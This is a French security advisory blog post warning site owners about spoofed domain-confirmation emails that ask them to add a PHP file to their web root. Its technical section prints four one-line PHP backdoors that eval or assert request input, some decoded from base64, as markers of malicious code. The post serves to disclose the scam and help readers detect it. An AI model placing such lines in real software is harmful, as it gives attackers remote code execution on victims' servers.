Ne faites pas confiance à ces faux e-mails de confirmation de domaine
Si jamais vous recevez une lettre quelconque vous demandant de créer, télécharger ou installer du code PHP sur votre site Web, vous devez l'ignorer
English version: Do not trust those fake domain confirmation emails
Récemment, certains de mes clients ont reçu des courriers électroniques étranges de leurs registraires de domaine. Ces lettres contiennent une demande de confirmation des domaines qui leur sont propres. J'ai vérifié une de ces lettres et l'ai rapidement identifiée comme une lettre frauduleuse . Toutes les lettres ont un modèle identique et une demande de création d'un fichier PHP dans le dossier racine d'un site Web avec un nom spécifique et le contenu donné. Inutile de dire que le contenu suggéré pour ce fichier PHP contient un code malveillant appelé code de porte dérobée. Ce type de code permet à l'attaquant d'exécuter n'importe quelle action sur le site Web d'une victime.
Si jamais vous recevez une lettre quelconque vous demandant de créer, télécharger ou installer du code PHP sur votre site Web, vous devez l'ignorer. Aucune exception. Même si la lettre vient du président ou de ta mère.
Les lettres frauduleuses semblent légitimes en raison de l' adresse e -mail de l'expéditeur légitime. Mais c'est une usurpation d'email. Vous ne vous attendez pas à recevoir un faux e-mail de la part de vos amis ou de votre registraire de domaine. Droite? Non! Toute lettre électronique peut contenir n'importe quelle adresse électronique de l'expéditeur. La grande majorité des serveurs de messagerie et des clients de messagerie ne vérifient pas ou ne vérifient pas l'adresse de l'expéditeur. Donc, vous le voyez comme un pirate voulait. Vous ne devez faire confiance à aucune lettre électronique que vous avez reçue d'un expéditeur connu si la lettre contient une demande d'action suspecte comme l'installation de code sur votre site Web ou d'une application sur votre ordinateur.
Détails techniques
Les faux e-mails contiennent généralement certaines des lignes PHP suivantes.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Pour info : base64_decode, eval et assert sont des marqueurs bien connus de code PHP suspect ou malveillant.
Voir aussi : Plugin Inspector révèle des problèmes de sécurité avec d'autres plugins